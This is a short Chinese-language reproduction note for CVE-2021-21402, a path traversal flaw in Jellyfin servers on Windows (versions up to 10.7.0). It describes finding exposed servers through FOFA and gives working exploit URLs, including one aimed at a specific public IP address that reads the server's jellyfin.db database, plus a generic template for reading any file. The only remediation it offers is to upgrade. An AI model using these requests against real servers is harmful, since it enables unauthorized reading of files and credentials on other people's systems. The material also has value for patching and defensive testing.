###CVE-2021-21402 JellyFin 任意文件读取-xxlm

漏洞简介

JellyFin的Windows端服务器不会对特定路径进行鉴权，可以导致攻击者利用Windows上的路径穿越来读取Windows服务器上的任意文件。本漏洞于2021年3月28日在最近版本的10.7.1中被修复。

影响版本

JellyFin <= 10.7.0

漏洞复现

fofa搜索JellyFin

判断版本

http://121.31.69.23:8096/System/Info/Public

以下是漏洞复现结果。
http://121.31.69.23:8096/Audio/anything/hls/..\data\jellyfin.db/stream.mp3/

可以通过访问

http://<url>/Audio/anything/hls/<文件路径>/stream.mp3/

读取任意文件。

加固建议

尽快升级到最新版本